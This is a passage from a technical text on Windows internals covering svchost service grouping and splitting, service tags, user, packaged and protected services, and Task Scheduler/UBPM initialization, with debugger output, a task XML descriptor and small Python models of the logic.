Services: Network Store Interface, Windows Diagnostic Host, Windows Time, COM+ Event System,
HTTP Auto-Proxy Service, Software Protection Platform UI Notification, Thread Order Service, LLDT
Discovery, SSL, FDP Host, WebClient
Notes: Services that run in the local service account and make use of the network on various ports or
have no network usage at all (and hence no restrictions).

Service Group: LocalServiceAndNoImpersonation
Services: UPnP and SSDP, Smart Card, TPM, Font Cache, Function Discovery, AppID, qWAVE,
Windows Connect Now, Media Center Extender, Adaptive Brightness
Notes: Services that run in the local service account and make use of the network on a fixed set of
ports. Services run with a write-restricted token.

Service Group: LocalServiceNetworkRestricted
Services: DHCP, Event Logger, Windows Audio, NetBIOS, Security Center, Parental Controls,
HomeGroup Provider
Notes: Services that run in the local service account and make use of the network on a fixed set of ports.

Service Group: LocalServiceNoNetwork
Services: Diagnostic Policy Engine, Base Filtering Engine, Performance Logging and Alerts, Windows
Firewall, WWAN AutoConfig
Notes: Services that run in the local service account but make no use of the network at all. Services
run with a write-restricted token.

Service Group: LocalSystemNetworkRestricted
Services: DWM, WDI System Host, Network Connections, Distributed Link Tracking, Windows Audio
Endpoint, Wired/WLAN AutoConfig, Pnp-X, HID Access, User-Mode Driver Framework Service,
Superfetch, Portable Device Enumerator, HomeGroup Listener, Tablet Input, Program Compatibility,
Offline Files
Notes: Services that run in the local system account and make use of the network on a fixed set of ports.

Service Group: NetworkService
Services: Cryptographic Services, DHCP Client, Terminal Services, WorkStation, Network Access
Protection, NLA, DNS Client, Telephony, Windows Event Collector, WinRM
Notes: Services that run in the network service account and make use of the network on various ports
(or have no enforced network restrictions).

Service Group: NetworkServiceAndNoImpersonation
Services: KTM for DTC
Notes: Services that run in the network service account and make use of the network on a fixed set of
ports. Services run with a write-restricted token.

Service Group: NetworkServiceNetworkRestricted
Services: IPSec Policy Agent
Notes: Services that run in the network service account and make use of the network on a fixed set of ports.
Svchost service splitting
As discussed in the previous section, running a service in a shared host process saves system resources
but has the big drawback that a single unhandled error in a service forces all the other services sharing
the host process to be killed as well. To overcome this problem, Windows 10 Creators Update (RS2) has
introduced the Svchost Service splitting feature.
When the SCM starts, it reads three values from the registry representing the services global commit
limits (divided into low, medium, and hard caps). These values are used by the SCM to send “low resources”
messages in case the system runs under low-memory conditions. It then reads the Svchost Service
split threshold value from the HKLM\SYSTEM\CurrentControlSet\Control\SvcHostSplitThresholdInKB
registry value. The value contains the minimum amount of system physical memory (expressed in KB)
needed to enable Svchost Service splitting (the default value is 3.5 GB on client systems and around
3.7 GB on server systems). The SCM then obtains the value of the total system physical memory using
the GlobalMemoryStatusEx API and compares it with the threshold previously read from the registry.
If the total physical memory is above the threshold, it enables Svchost service splitting (by setting an
internal global variable).
Svchost service splitting, when active, modifies the behavior in which SCM starts the host Svchost
process of shared services. As already discussed in the “Service start” section earlier in this chapter, the
SCM does not search for an existing image record in its database if service splitting is allowed for a ser-
vice. This means that, even though a service is marked as sharable, it is started using its private hosting
process (and its type is changed to SERVICE_WIN32_OWN_PROCESS). Service splitting is allowed only
if the following conditions apply:

- Svchost Service splitting is globally enabled.
- The service is not marked as critical. A service is marked as critical if its next recovery action specifies to reboot the machine (as discussed previously in the “Service failures” section).
- The service host process name is Svchost.exe.
- Service splitting is not explicitly disabled for the service through the SvcHostSplitDisable registry value in the service control key.
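A minimal sketch of this four-way check follows; it is a model of the decision described above with hypothetical parameter names, not the SCM's actual code:

```python
# Model of the SCM's per-service split-allowed decision: all four of the
# conditions listed above must hold for a shared service to be split.

def service_split_allowed(globally_enabled: bool,
                          is_critical: bool,
                          host_image_name: str,
                          split_disabled_in_registry: bool) -> bool:
    return (globally_enabled                              # splitting enabled system-wide
            and not is_critical                           # next recovery action is not reboot
            and host_image_name.lower() == "svchost.exe"  # host process is Svchost.exe
            and not split_disabled_in_registry)           # SvcHostSplitDisable not set

print(service_split_allowed(True, False, "Svchost.exe", False))   # True
```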
Memory manager technologies like Memory Compression and Combining help keep the system's working set consumption as low as possible. This explains one of the motivations behind the enablement of Svchost service splitting: even though many new processes are created in the system, the memory manager ensures that the physical pages of the hosting processes remain shared and consume as few system resources as possible. Memory combining, compression, and memory sharing are explained in detail in Chapter 5 of Part 1.
EXPERIMENT: Playing with Svchost service splitting
If you are using a Windows 10 workstation equipped with 4 GB or more of memory, when you open Task Manager you may notice that a lot of Svchost.exe process instances are currently executing. As explained in this section, this doesn't produce a memory waste problem, but you might still be interested in disabling Svchost splitting. First, open Task Manager and count how many
svchost process instances are currently running in the system. On a Windows 10 May 2019 Update
(19H1) system, you should have around 80 Svchost process instances. You can easily count them by
opening an administrative PowerShell window and typing the following command:
(get-process -Name "svchost" | measure).Count
On the sample system, the preceding command returned 85.
Open the Registry Editor (by typing regedit.exe in the Cortana search box) and navigate to the HKLM\SYSTEM\CurrentControlSet\Control key. Note the current value of the
SvcHostSplitThresholdInKB DWORD value. To globally disable Svchost service splitting, you
should modify the registry value by setting its data to 0. (You change it by double-clicking the
registry value and entering 0.) After modifying the registry value, restart the system and repeat the previous step, counting the number of Svchost process instances. The system now runs with far fewer of them:
PS C:\> (get-process -Name "svchost" | measure).Count
26
To return to the previous behavior, restore the previous content of the SvcHostSplitThresholdInKB registry value. By modifying the DWORD value, you can also fine-tune the amount of physical memory required for Svchost splitting to be enabled.
Service tags
One of the disadvantages of using service-hosting processes is that accounting for CPU time and resource usage by a specific service is much harder, because each service shares the memory address space, handle table, and per-process CPU accounting numbers with the other services that are part of the same service group. Although there is always a thread inside the service-hosting process that belongs to a certain service, this association is not always easy to make. For example, the service might be using worker threads to perform its operation, or the start address and stack of a thread might not reveal the service's DLL name, making it hard to figure out what kind of work a thread is doing and to which service it belongs.
Windows implements a service attribute called the service tag (not to be confused with the driver
tag), which the SCM generates by calling ScGenerateServiceTag when a service is created or when the
service database is generated during system boot. The attribute is simply an index identifying the service. The service tag is stored in the SubProcessTag field of the thread environment block (TEB) of each
thread (see Chapter 3 of Part 1 for more information on the TEB) and is propagated across all threads
that a main service thread creates (except threads created indirectly by thread-pool APIs).
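The idea can be illustrated with a small sketch; everything here is a hypothetical model (the real tag is generated by ScGenerateServiceTag and lives in the TEB's SubProcessTag field):

```python
# Model of how a service-tag table lets a diagnostic tool map a thread back
# to its owning service: the SCM keeps an index per service, and each
# service thread carries that index (here, in a simulated TEB field).

service_tags = {}                    # tag index -> service name

def generate_service_tag(name, _counter=[0]):
    _counter[0] += 1
    service_tags[_counter[0]] = name
    return _counter[0]

class Thread:
    def __init__(self, sub_process_tag):
        self.sub_process_tag = sub_process_tag   # models TEB.SubProcessTag

tag = generate_service_tag("CryptSvc")           # a real service name, used as an example
worker = Thread(sub_process_tag=tag)             # the tag propagates to created threads
print(service_tags[worker.sub_process_tag])      # CryptSvc
```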
Although the service tag is kept internal to the SCM, several Windows utilities, like Netstat.exe
(a utility you can use for displaying which programs have opened which ports on the network), use
undocumented APIs to query service tags and map them to service names. Another tool you can use
to look at service tags is ScTagQuery from Winsider Seminars & Solutions Inc. (www.winsiderss.com/
tools/sctagquery/sctagquery.htm). It can query the SCM for the mappings of every service tag and
display them either systemwide or per-process. It can also show you to which services all the threads
inside a service-hosting process belong. (This is conditional on those threads having a proper service
tag associated with them.) This way, if you have a runaway service consuming lots of CPU time, you can identify the culprit service even when the thread start address or stack does not point to an obvious service DLL.
User services
As discussed in the “Running services in alternate accounts” section, a service can be launched using
the account of a local system user. A service configured in that way is always loaded using the specified
user account, regardless of whether the user is currently logged on. This can be a limitation in multiuser environments, where a service should be executed with the access token of the currently logged-on user. Furthermore, it can put the user account at risk, because malicious users can potentially inject code into the service process and use its token to access resources they are not supposed to (including authenticating on the network).
Available from Windows 10 Creators Update (RS2), User Services allow a service to run with the
token of the currently logged-on user. User services can be run in their own process or can share a
process with one or more other services running in the same logged-on user account, as standard services do. They are started when a user performs an interactive logon and stopped when the user logs
off. The SCM internally supports two additional type flags—SERVICE_USER_SERVICE (64) and SERVICE_
USERSERVICE_INSTANCE (128)—which identify a user service template and a user service instance.
One of the states of the Winlogon finite-state machine (see Chapter 12 for details on Winlogon
and the boot process) is executed when an interactive logon has been initiated. The state creates the
new user’s logon session, window station, desktop, and environment; maps the HKEY_CURRENT_USER
registry hive; and notifies the logon subscribers (LogonUI and User Manager). The User Manager service (Usermgr.dll) then calls into the SCM through RPC to deliver the WTS_SESSION_LOGON session event.
The SCM processes the message through the ScCreateUserServicesForUser function, which calls
back into the User Manager for obtaining the currently logged-on user’s token. It then queries the list
of user template services from the SCM database and, for each of them, generates the new name of
the user instance service.
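The naming scheme can be sketched as follows; the exact formatting is an assumption inferred from the instance names shown in this section (for example, CDPUserSvc_55d01):

```python
# Sketch of user-service instance naming: the template service name is
# suffixed with the logon session's context ID (a LUID rendered in hex).
# This is an illustration of the convention, not the SCM's actual code.

def user_service_instance_name(template_name: str, context_luid: int) -> str:
    return f"{template_name}_{context_luid:x}"

print(user_service_instance_name("CDPUserSvc", 0x55d01))   # CDPUserSvc_55d01
```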
EXPERIMENT: Witnessing user services
A kernel debugger can easily show the security attributes of a process's token. For this experiment, you need a Windows 10 machine with a kernel debugger enabled and attached to a host (a local debugger works, too). In this experiment, you choose a user service instance and analyze its hosting process's token. Open the Services tool by typing its name in the Cortana search box. The application shows standard services as well as user service instances (even though it erroneously displays Local System as the user account), which can be easily identified because they have a local unique ID (LUID, generated by the User Manager) attached to their displayed names.
In the example, the Connected Device User Service is displayed by the Services application as
Connected Device User Service_55d01:
If you double-click the identified service, the tool shows the actual name of the user service
instance (CDPUserSvc_55d01 in the example). If the service is hosted in a shared process, like the
one chosen in the example, you should use the Registry Editor to navigate to the service root key
of the user service template, which has the same name as the instance but without the LUID (the
user service template name is CDPUserSvc in the example). As explained in the “Viewing privileges required by services” experiment, under the Parameters subkey, the Service DLL name is
stored. The DLL name should be used in Process Explorer for finding the correct hosting process
ID (or you can simply use Task Manager in the latest Windows 10 versions).
After you have found the PID of the hosting process, break into the kernel debugger and type the following command (replacing <ServicePid> with the PID of the service's hosting process):
!process <ServicePid> 1
The debugger displays several pieces of information, including the address of the associated
security token object:
Kd: 0> !process 0n5936 1
Searching for Process with Cid == 1730
PROCESS ffffe10646205080
    SessionId: 2  Cid: 1730    Peb: 81ebbd1000  ParentCid: 0344
    DirBase: 8fe39002  ObjectTable: ffffa387c2826340  HandleCount: 313.
    Image: svchost.exe
    VadRoot ffffe1064629c340 Vads 108 Clone 0 Private 962. Modified 214. Locked 0.
    DeviceMap ffffa387be1341a0
    Token                             ffffa387c2bdc060
    ElapsedTime                       00:35:29.441
    ...
<Output omitted for space reasons>
To show the security attributes of the token, you just need to use the !token command fol-
lowed by the address of the token object (which internally is represented with a _TOKEN data
structure) returned by the previous command. You should easily confirm that the process is
hosting a user service by seeing the WIN://ScmUserService security attribute, as shown in the
following output:
0: kd> !token ffffa387c2bdc060
_TOKEN 0xffffa387c2bdc060
TS Session ID: 0x2
User: S-1-5-21-725390342-1520761410-3673083892-1001
User Groups:
 00 S-1-5-21-725390342-1520761410-3673083892-513
    Attributes - Mandatory Default Enabled
... <Output omitted for space reason> ...
OriginatingLogonSession: 3e7
PackageSid: (null)
CapabilityCount: 0
Capabilities: 0x0000000000000000
LowboxNumberEntry: 0x0000000000000000
Security Attributes:
 00 Claim Name : WIN://SCMUserService
    Claim Flags: 0x40 - UNKNOWN
    Value Type : CLAIM_SECURITY_ATTRIBUTE_TYPE_UINT64
    Value Count: 1
    Value[0]   : 0
 01 Claim Name : TSA://ProcUnique
    Claim Flags: 0x41 - UNKNOWN
    Value Type : CLAIM_SECURITY_ATTRIBUTE_TYPE_UINT64
    Value Count: 2
    Value[0]   : 102
    Value[1]   : 352550
Process Hacker, a system tool similar to Process Explorer and available at https://processhacker.sourceforge.io/, is able to extract the same information.
As discussed previously, the name of a user service instance is generated by combining the
original name of the service and a local unique ID (LUID) generated by the User Manager for
identifying the user’s interactive session (internally called context ID). The context ID for the
interactive logon session is stored in the volatile HKLM\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Winlogon\VolatileUserMgrKey\<Session ID>\<User SID>\contextLuid registry
value, where <Session ID> and <User SID> identify the logon session ID and the user SID. If you
open the Registry Editor and navigate to this key, you will find the same context ID value as the
one used for generating the user service instance name.
Figure 10-22 shows an example of a user service instance, the Clipboard User Service, which is run
using the token of the currently logged-on user. The generated context ID for session 1 is 0x3a182, as
shown by the User Manager volatile registry key (see the previous experiment for details). The SCM
then calls ScCreateService, which creates a service record in the SCM database. The new service record
represents a new user service instance and is saved in the registry as for normal services. The service
security descriptor, all the dependent services, and the triggers information are copied from the user
service template to the new user instance service.
FIGURE 10-22 The Clipboard User Service instance running in the context ID 0x3a182.
The SCM registers any service triggers (see the “Triggered-start services” section earlier in
this chapter for details) and then starts the service (if its start type is set to SERVICE_AUTO_START). As
discussed in the “Service logon” section, when the SCM starts a process hosting a user service, it assigns it the token of the currently logged-on user and the WIN://ScmUserService security attribute, which the SCM uses to recognize that the process is really hosting a service. Figure 10-23 shows that, after a user has logged in to the system, both the instance and template subkeys are stored in the root services key, representing the same user service. The instance subkey is deleted on user logoff and ignored if it's still present
at system startup time.
FIGURE 10-23 User service instance and template registry keys.
Packaged services
As briefly introduced in the “Service logon” section, since Windows 10 Anniversary Update (RS1), the
Service Control Manager has supported packaged services. A packaged service is identified through the
SERVICE_PKG_SERVICE (512) flag set in its service type. Packaged services have been designed mainly to
support standard Win32 desktop applications (which may run with an associated service) converted to
the new Modern Application Model. The Desktop App Converter is indeed able to convert a Win32 application to a Centennial app, which runs in a lightweight container, internally called Helium. More details
on the Modern Application Model are available in the “Packaged application” section of Chapter 8.
When starting a packaged service, the SCM reads the package information from the registry, and, as
for standard Centennial applications, calls into the AppInfo service. The latter verifies that the package
information exists in the state repository and the integrity of all the application package files. It then
stamps the new service’s host process token with the correct security attributes. The process is then
launched in a suspended state using the CreateProcessAsUser API (including the Package Full Name attribute), and a Helium container is created, which applies registry redirection and Virtual File System (VFS), as for regular Centennial applications.
Protected services
Chapter 3 of Part 1 described in detail the architecture of protected processes and protected processes
light (PPL). Starting with Windows 8.1, the Service Control Manager supports protected services. At the time of this
writing, a service can have four levels of protection: Windows, Windows light, Antimalware light, and
App. A service control program can specify the protection of a service using the ChangeServiceConfig2
API (with the SERVICE_CONFIG_LAUNCH_PROTECTED information level). A service's main executable (or library, in the case of shared services) must be properly signed to run as a protected service, following the same rules as for protected processes (which means that the system checks the digital signature's
EKU and root certificate and generates a maximum signer level, as explained in Chapter 3 of Part 1).
A service's hosting process launched as protected is guaranteed a certain level of protection with respect to other, nonprotected processes: depending on the protection level, nonprotected processes can't acquire certain access rights when trying to access the protected service's hosting process. (The mechanism is identical to that of standard protected processes. A classic example is a nonprotected process not being able to inject any kind of code into a protected service.)
Even processes launched under the SYSTEM account can’t access a protected process. However,
the SCM should be fully able to access a protected service’s hosting process. So, Wininit.exe launches the
SCM by specifying the maximum user-mode protection level: WinTcb Light. Figure 10-24 shows the
digital signature of the SCM main executable, services.exe, which includes the Windows TCB Component
EKU (1.3.6.1.4.1.311.10.3.23).
FIGURE 10-24 The Service Control Manager main executable (services.exe) digital certificate.
The second part of the protection is provided by the Service Control Manager. When a client requests an action to be performed on a protected service, the SCM calls the ScCheckServiceProtectedProcess routine to check whether the caller has enough access rights to perform the requested action on the service. Table 10-13 lists the operations denied when requested by a nonprotected process on a protected service.
TABLE 10-13 List of operations denied when requested from a nonprotected client

Involved API Name        | Operation                                  | Description
ChangeServiceConfig2     | Change service configuration               | Any change of configuration to a protected service is denied.
SetServiceObjectSecurity | Set a new security descriptor on a service | Application of a new security descriptor to a protected service is denied. (It could lower the service attack surface.)
DeleteService            | Delete a service                           | A nonprotected process can't delete a protected service.
ControlService           | Send a control code to a service           | Only service-defined control codes and SERVICE_CONTROL_INTERROGATE are allowed for nonprotected callers. SERVICE_CONTROL_STOP is allowed for any protection level except Antimalware.
The ScCheckServiceProtectedProcess function looks up the service record from the caller-specified service handle and, in case the service is not protected, always grants access. Otherwise, it impersonates the client process token, obtains its process protection level, and implements the following rules:

- If the request is a STOP control request and the target service is not protected at Antimalware level, it grants access (Antimalware-protected services are not stoppable by nonprotected processes).
- If the TrustedInstaller service SID is present in the client's token groups or is set as the token user, the SCM grants access regardless of the client's process protection.
- Otherwise, it calls RtlTestProtectedAccess, which performs the same checks implemented for protected processes. Access is granted only if the client process has a protection level compatible with the target service. For example, a Windows protected process can always operate on all protected service levels, while an Antimalware PPL can only operate on Antimalware and App protected services.
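These rules can be modeled in a short sketch. The protection-level ranking and all names here are a simplification for illustration only; the real checks are performed by ScCheckServiceProtectedProcess and RtlTestProtectedAccess:

```python
# Simplified model of the SCM's access check for protected services.
# The numeric ranking is a hypothetical dominance relation inferred from
# the examples in the text (Windows dominates everything; Antimalware
# dominates Antimalware and App).

RANK = {"App": 0, "Antimalware": 1, "WindowsLight": 2, "Windows": 3}

def dominates(client_level, target_level):
    return RANK.get(client_level, -1) >= RANK.get(target_level, 99)

def scm_grants_access(request, client):
    # Rule 1: STOP is allowed on any protection level except Antimalware.
    if request["control"] == "STOP" and request["target_level"] != "Antimalware":
        return True
    # Rule 2: TrustedInstaller callers are granted access unconditionally.
    if client["is_trusted_installer"]:
        return True
    # Rule 3: otherwise, the client's protection level must dominate the target's.
    return dominates(client["level"], request["target_level"])

# A nonprotected client may stop a Windows-protected service...
print(scm_grants_access({"control": "STOP", "target_level": "Windows"},
                        {"is_trusted_installer": False, "level": None}))        # True
# ...but an Antimalware PPL cannot reconfigure a Windows-protected service.
print(scm_grants_access({"control": "CONFIG", "target_level": "Windows"},
                        {"is_trusted_installer": False, "level": "Antimalware"}))  # False
```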
Note that the last check described is not executed for any client process running with the TrustedInstaller virtual service account. This is by design: when Windows Update installs an update, it should be able to start, stop, and control any kind of service without requiring itself to be signed with a strong digital signature (which could expose Windows Update to an undesired attack surface).
Task scheduling and UBPM
Various Windows components have traditionally been in charge of managing hosted or background
tasks as the operating system has grown in complexity and features, from the Service Control Manager, described earlier, to the DCOM Server Launcher and the WMI Provider—all of which are also responsible for the execution of out-of-process, hosted code.
use the Background Broker Infrastructure to manage the majority of background tasks of modern ap-
plications (see Chapter 8 for more details), the Task Scheduler is still the main component that manages
Win32 tasks. Windows implements a Unified Background Process Manager (UBPM), which handles
tasks managed by the Task Scheduler.
The Task Scheduler service (Schedule) is implemented in the Schedsvc.dll library and started in a
shared Svchost process. The Task Scheduler service maintains the tasks database and hosts UBPM,
which starts and stops tasks and manages their actions and triggers. UBPM uses the services provided
by the Desktop Activity Broker (DAB), the System Events Broker (SEB), and the Resource Manager for
receiving notification when tasks’ triggers are generated. (DAB and SEB are both hosted in the System
Events Broker service, whereas Resource Manager is hosted in the Broker Infrastructure service.) Both
the Task Scheduler and UBPM provide public interfaces exposed over RPC. External applications can
use COM objects to attach to those interfaces and interact with regular Win32 tasks.
The Task Scheduler
The Task Scheduler implements the task store, which provides storage for each task. It also hosts the
Scheduler idle service, which is able to detect when the system enters or exits the idle state, and the
Event trap provider, which helps the Task Scheduler to launch a task upon a change in the machine
state and provides an internal event log triggering system. The Task Scheduler also includes another
component, the UBPM Proxy, which collects all the tasks’ actions and triggers, converts their descrip-
tors to a format that UBPM can understand, and sends them to UBPM.
An overview of the Task Scheduler architecture is shown in Figure 10-25. As highlighted by the
figure, the Task Scheduler works in close collaboration with UBPM (both components run in the Task Scheduler service, which is hosted by a shared Svchost.exe process). UBPM manages the tasks' states and receives notifications from SEB, DAB, and the Resource Manager through WNF states.
FIGURE 10-25 The Task Scheduler architecture. (The diagram shows task control programs such as Schtasks.exe, PowerShell/WMI through the Schedprov.dll WMI provider, and legacy tools like at.exe through the Taskcomp.dll compatibility plug-in, all reaching the Task Scheduler service (Schedsvc.dll) via the Taskschd.dll COM APIs and RPC. The service hosts the UbpmProxy and UBPM (Ubpm.dll), which exchanges WNF state notifications with the Desktop Activity Broker and System Events Broker, hosted in the System Events Broker service, and with the Resource Manager, hosted in the BrokerInfrastructure service, and manages tasks running in the Task Host client, Taskhostw.exe, as well as COM and non-hosted tasks.)
The Task Scheduler has the important job of exposing the server part of the COM Task Scheduler
APIs. When a Task Control program invokes one of those APIs, the Task Scheduler COM API library
(Taskschd.dll) is loaded in the address space of the application by the COM engine. The library requests
services on behalf of the Task Control Program to the Task Scheduler through RPC interfaces.
In a similar way, the Task Scheduler WMI provider (Schedprov.dll) implements COM classes and
methods able to communicate with the Task Scheduler COM API library. Its WMI classes, properties,
and events can be called from Windows PowerShell through the ScheduledTasks cmdlet (documented
at https://docs.microsoft.com/en-us/powershell/module/scheduledtasks/). Note that the Task Scheduler
includes a Compatibility plug-in, which allows legacy applications, like the AT command, to work with
the Task Scheduler. In the May 2019 Update edition of Windows 10 (19H1), the AT tool has been declared deprecated, and you should use schtasks.exe instead.
Initialization
When started by the Service Control Manager, the Task Scheduler service begins its initialization procedure. It starts by registering its manifest-based ETW event provider (which has the DE7B24EA-73C8-4A09-985D-5BDADCFA9017 global unique ID). All the events generated by the Task Scheduler are consumed by UBPM. It then initializes the Credential store, which is a component used to securely access
the user credentials stored by the Credential Manager and the Task store. The latter checks that all the
XML task descriptors located in the Task store's secondary shadow copy (maintained for compatibility reasons and usually located in the %SystemRoot%\System32\Tasks path) are in sync with the task descriptors located in the Task store cache. The Task store cache is represented by multiple registry keys, with
the root being HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache.
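The sync check can be sketched as a simple set comparison. The function name and the data below are simulated, not read from the real Task store (the Defrag task path is a real example task; "\MyTask" is hypothetical):

```python
# Illustrative sketch of the consistency check described above: the set of
# XML descriptors in the on-disk shadow copy must match the entries in the
# Task store cache. Two empty difference sets mean the stores are in sync.

def store_diff(shadow_copy_tasks: set, cache_tasks: set):
    """Return (missing_in_cache, missing_on_disk)."""
    return shadow_copy_tasks - cache_tasks, cache_tasks - shadow_copy_tasks

missing_in_cache, missing_on_disk = store_diff(
    {"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "\\MyTask"},
    {"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag"},
)
print(missing_in_cache, missing_on_disk)
```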
The next step in the Task Scheduler initialization is to initialize UBPM. The Task Scheduler service uses
the UbpmInitialize API exported from UBPM.dll to start the core components of UBPM. The function registers an ETW consumer of the Task Scheduler's event provider and connects to the Resource
Manager. The Resource Manager is a component loaded by the Process State Manager (Psmsrv.dll, in the
context of the Broker Infrastructure service), which drives resource-wise policies based on the machine
state and global resource usage. Resource Manager helps UBPM to manage maintenance tasks. Those
types of tasks run only in particular system states, like when the workstation CPU usage is low, when
game mode is off, the user is not physically present, and so on. UBPM initialization code then retrieves
the WNF state names representing the task’s conditions from the System Event Broker: AC power, Idle
Workstation, IP address or network available, Workstation switching to Battery power. (Those conditions
are visible in the Conditions sheet of the Create Task dialog box of the Task Scheduler MMC plug-in.)
UBPM initializes its internal thread pool worker threads, obtains system power capabilities, reads a
list of the maintenance and critical task actions (from the HKLM\System\CurrentControlSet\Control\
Ubpm registry key and group policy settings) and subscribes to system power settings notifications
(in that way UBPM knows when the system changes its power state).
The execution control returns to the Task Scheduler, which finally registers the global RPC interfaces
of both itself and UBPM. Those interfaces are used by the Task Scheduler API client-side DLL (Taskschd.dll)
to provide a way for client processes to interact with the Task Scheduler via the Task Scheduler COM
interfaces, which are documented at https://docs.microsoft.com/en-us/windows/win32/api/taskschd/.
478
CHAPTER 10 Management, diagnostics, and tracing
After the initialization is complete, the Task store enumerates all the tasks that are installed in the
system and starts each of them. Tasks are stored in the cache in four groups: Boot, Logon, Plain, and
Maintenance. Each group has an associated subkey, called the Index Group Tasks key, located in the
Task store's root registry key (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\
TaskCache, as introduced previously). Inside each Index Tasks group key is one subkey per each task,
identified through a global unique identifier (GUID). The Task Scheduler enumerates the names of all
the group’s subkeys, and, for each of them, opens the relative Task’s master key, which is located in the
Tasks subkey of the Task store’s root registry key. Figure 10-26 shows a sample boot task, which has the
{0C7D8A27-9B28-49F1-979C-AD37C4D290B1} GUID. The task GUID is listed in the figure as one of the
first entries in the Boot index group key. The figure also shows the master Task key, which stores binary
data in the registry to entirely describe the task.
FIGURE 10-26 A boot task master key.
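The enumeration just described can be modeled in a few lines of Python. This is a hedged sketch only: `task_cache` is a hypothetical dictionary standing in for the TaskCache registry layout, and `enumerate_tasks` is an invented name, not a real Task Scheduler API.

```python
def enumerate_tasks(task_cache):
    """Walk each index group key (Boot, Logon, Plain, Maintenance), then
    open the master key of every task GUID listed in the group.
    task_cache is an illustrative dict modeling the TaskCache registry
    layout, not the real registry API."""
    tasks = []
    for group in ("Boot", "Logon", "Plain", "Maintenance"):
        for guid in task_cache.get(group, ()):
            # Each group subkey lists task GUIDs; the master key for each
            # GUID lives under the Tasks subkey of the Task store root.
            master_key = task_cache.get("Tasks", {}).get(guid)
            if master_key is not None:
                tasks.append((group, guid, master_key))
    return tasks
```

The real service performs the same two-level walk: group subkeys yield GUIDs, and each GUID names a master key that fully describes the task.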
The task’s master key contains all the information that describes the task. Two properties of the task
are the most important: Triggers, which describe the conditions that will trigger the task, and Actions,
which describe what happens when the task is executed. Both properties are stored in binary registry
values (named "Triggers" and "Actions," as shown in Figure 10-26). The Task Scheduler first reads the
hash of the entire task descriptor (stored in the Hash registry value); then it reads all the task’s configu-
ration data and the binary data for triggers and actions. After parsing this data, it adds each identified
trigger and action descriptor to an internal list.
The Task Scheduler then recalculates the SHA256 hash of the new task descriptor (which includes
all the data read from the registry) and compares it with the expected value. If the two hashes do not
match, the Task Scheduler opens the XML file associated with the task contained in the store’s shadow
copy (the %SystemRoot%\System32\Tasks folder), parses its data and recalculates a new hash, and
finally replaces the task descriptor in the registry. Indeed, tasks can be described by binary data in-
cluded in the registry and also by an XML file, which adheres to a well-defined schema, documented at
https://docs.microsoft.com/en-us/windows/win32/taskschd/task-scheduler-schema.
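The validation logic just described can be sketched in Python. This is a hedged illustration only: `load_task_descriptor` and its parameters are hypothetical stand-ins for the service's internal flow, not a real API (the real service also re-parses the XML and writes the rebuilt descriptor back to the registry).

```python
import hashlib

def load_task_descriptor(registry_blob: bytes, stored_hash: bytes,
                         xml_shadow_copy: bytes) -> bytes:
    """Recompute the SHA256 hash of the cached registry descriptor and
    compare it with the stored value; on a mismatch, fall back to the
    XML shadow copy of the task."""
    if hashlib.sha256(registry_blob).digest() == stored_hash:
        return registry_blob          # cache is consistent: use it as-is
    return xml_shadow_copy            # cache is stale: rebuild from XML
```

The hash thus acts as a consistency check between the binary registry cache and the authoritative XML descriptor in the store's shadow copy.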
EXPERIMENT: Explore a task’s XML descriptor
Task descriptors, as introduced in this section, are stored by the Task store in two formats: XML
file and in the registry. In this experiment, you will peek at both formats. First, open the Task
Scheduler applet by typing taskschd.msc in the Cortana search box. Expand the Task Scheduler
Library node and all the subnodes until you reach the Microsoft\Windows folder. Explore each
subnode and search for a task that has the Actions tab set to Custom Handler. The action type
is used for describing COM-hosted tasks, which are not supported by the Task Scheduler applet.
In this example, we consider the ProcessMemoryDiagnosticEvents task, which can be found under the
MemoryDiagnostic folder, but any task with its Actions set to Custom Handler works well:
Open an administrative command prompt window (by typing CMD in the Cortana search
box and selecting Run As Administrator); then type the following command (replacing the task
path with the one of your choice):
schtasks /query /tn "Microsoft\Windows\MemoryDiagnostic\ProcessMemoryDiagnosticEvents" /xml
The output shows the task’s XML descriptor, which includes the Task’s security descriptor
(used to protect the task from being opened by unauthorized identities), the task's author and de-
scription, the security principal that should run it, the task settings, and task triggers and actions:
<?xml version="1.0" encoding="UTF-16"?>
<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Version>1.0</Version>
<SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)</SecurityDescriptor>
<Author>$(@%SystemRoot%\system32\MemoryDiagnostic.dll,-600)</Author>
<Description>$(@%SystemRoot%\system32\MemoryDiagnostic.dll,-603)</Description>
<URI>\Microsoft\Windows\MemoryDiagnostic\ProcessMemoryDiagnosticEvents</URI>
</RegistrationInfo>
<Principals>
<Principal id="LocalAdmin">
<GroupId>S-1-5-32-544</GroupId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<AllowHardTerminate>false</AllowHardTerminate>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<Enabled>false</Enabled>
<ExecutionTimeLimit>PT2H</ExecutionTimeLimit>
<Hidden>true</Hidden>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfIdle>true</RunOnlyIfIdle>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>true</RestartOnIdle>
</IdleSettings>
<UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
</Settings>
<Triggers>
<EventTrigger>
      <Subscription><QueryList><Query Id="0" Path="System"><Select Path="System">*[System[Provider[@Name='Microsoft-Windows-WER-SystemErrorReporting'] and (EventID=1000 or EventID=1001 or EventID=1006)]]</Select></Query></QueryList></Subscription>
</EventTrigger>
. . . [cut for space reasons] . . .
</Triggers>
<Actions Context="LocalAdmin">
<ComHandler>
<ClassId>{8168E74A-B39F-46D8-ADCD-7BED477B80A3}</ClassId>
<Data><![CDATA[Event]]></Data>
</ComHandler>
</Actions>
</Task>
In the case of the ProcessMemoryDiagnosticEvents task, there are multiple ETW triggers (which
allow the task to be executed only when certain diagnostic events are generated; indeed, the
trigger descriptors include the ETW query specified in XPath format). The only registered action
is a ComHandler, which includes just the CLSID (class ID) of the COM object representing the task.
